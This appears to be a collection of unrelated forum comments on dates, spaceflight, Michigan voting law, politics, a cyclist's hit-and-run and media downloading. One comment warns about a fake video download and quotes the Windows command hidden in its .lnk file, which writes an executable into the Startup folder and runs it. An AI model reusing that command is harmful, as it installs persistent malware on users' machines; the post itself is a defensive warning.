Sure, but if I tell you the month, you still know what part of the year it is. If it's sunny, or if it's rainy must mean something to you.

Because the month tells me more about how far in the future something is. If I have an appointment on the 12th of July, there's not much information in knowing it's on the 12th. 12th of what? But it's in July, so between 1 and 2 months in the future. If I need more info, then I'll pay attention to the day. So in order of information given.

Historical dates are similar, except I really just need (roughly) the year, and then a month if that's relevant. Knowing the exact date of a historical event is just showing off. But if you know the month, you know what season it was, what the weather was probably like. Was it planting/growing/harvest time? You can guess at a lot of things with just the month.

NASA goes to obscene lengths to sterilize spacecraft, but once people start going all bets are off. I doubt there would be any meaningful results from such an experiment before human explorers arrive.

Especially now that we’re moving closer to an electric future, something that would make this system obsolete and unnecessary.

I'm willing to bet that the people looking to get rid of stop-start systems also hate electric cars.

Michigan isn't on this list. We have 10 days early voting, absentee voting, and an independent redistricting committee. All due to ballot initiatives. Reps took control in January, and the first thing they did was file a lawsuit against all of those. They say the ballot initiatives are unconstitutional because state legislatures have sole responsibility for voting regulations.

Don't make fun of him for having a parasite, lots of people have parasites.

Don't make fun of him for being anti-vax, it's not his fault he doesn't remember polio.

Don't make fun of him for believing vitamin A and ivermectin can cure all diseases, he clearly never went to medical school.

Don't make fun of him for having the skin-care routine of a rotisserie chicken, nobody stays young-looking forever.

Don't make fun of him for being stupid, there are stupid people in my own family.

Is it Lemmy.zip that forces the ridiculous disclaimer at the bottom of these posts?

There was another imam that said men must have beards because clean-shaven men were woman-like and a temptation for other men.

I use a system at work that is 100% web based. I have 2 4k monitors in my desk. Why are the apps formatted for viewing on a phone? I've gotten to the point of hacking the CSS on every page just to make things usable.

At the last version upgrade, the developers made some changes to the interface. They couldn't be bothered to change the existing CSS, so they just put !important on all the new stuff.

I 'accidentally' questioned the reputability of a scientific study sponsored by the Chinese government. They accused me of being racist and banned me.

It's literally the last paragraph.

It was designed to blackmail, so it resorts to blackmail. This shouldn't even be a story.

Do these people in Congress actually think like this? Or are they aware they're just being performative?

In 50 years, history will speak about ICE the way we speak about the SS now.

“I get it that it makes people feel good to see people yelling,” Slotkin said. “But not one of those words is stopping the actual things that Donald Trump is doing.”

Perhaps it's not working because of people like Slotkin willing to continue the losing strategies of the past.

TJ Day liked riding his bike to and from work at Walgreens. It helped him stay fit and gave him time to wind down in the evening.

He wore a reflective vest, helmet and added lights to the front and back of his bike for safety. He did everything right, said his sister Kelli Day.

Still, TJ was hit by a car on his way home from work on Feb. 18.

Another driver who found him in a snowbank on Lovers Lane near Stryker Way after the hit-and-run. That driver stayed in contact, and later offered to buy TJ a new bike. But in the meantime, supporters of TJ had already raised more than $20,000 to buy him a car.

As of Thursday, March 6, a GoFundMe Kelli organized has raised $23,427, with a goal of $28,000.

TJ has always been apprehensive about driving, but now he’s more nervous of biking, Kelli said. The generosity of his community will help him get a safe and reliable car.

I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I've gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:

%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c="%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe"&(If not exist !c! Findstr/v "cmd.EXE Rj%TIME:~7,1%%TIME:~-2%" !el!.Lnk>!c!&Start "" !c!)&CD %tmp%&Echo.>!

As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it's in your startup folder, it will run again every time you reboot.

The tracker is theRARBG, but it could also come from elsewhere. I've found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.

Be careful!

Remember when Donald Trump was president, in the lobotomized body of Bill the Cat? Haha good times.
